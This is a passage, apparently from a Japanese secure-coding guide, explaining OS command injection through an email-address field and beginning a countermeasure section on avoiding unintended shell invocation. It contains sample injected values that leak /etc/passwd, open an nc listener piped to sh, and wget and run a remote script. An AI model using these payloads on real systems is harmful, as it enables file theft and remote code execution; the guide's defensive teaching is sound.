攻撃者は、この to_address に次のような文字列を与えて、サーバ運用者の意図に反したコマンドの実行を行わせることができる。 投入する文字列: evil@site </etc/passwd # → /etc/passwd ファイルが流出する 投入する文字列: dummy@site </dev/null; nc -l -p 8080 | sh # → 遠隔からシェルコマンドの投入を待ち受ける(ファイアウォールで阻止されないとき) 投入する文字列: dummy@site </dev/null; wget http://site/badscript; sh badscript # → 悪意のスクリプトをダウンロードし実行させられる 対策 その1: うっかりシェルを動かさない 自分ではそのつもりが無くても、プログラマがシェルを起動するAPIを気づかぬうちに使っていることがありうる。 使い方に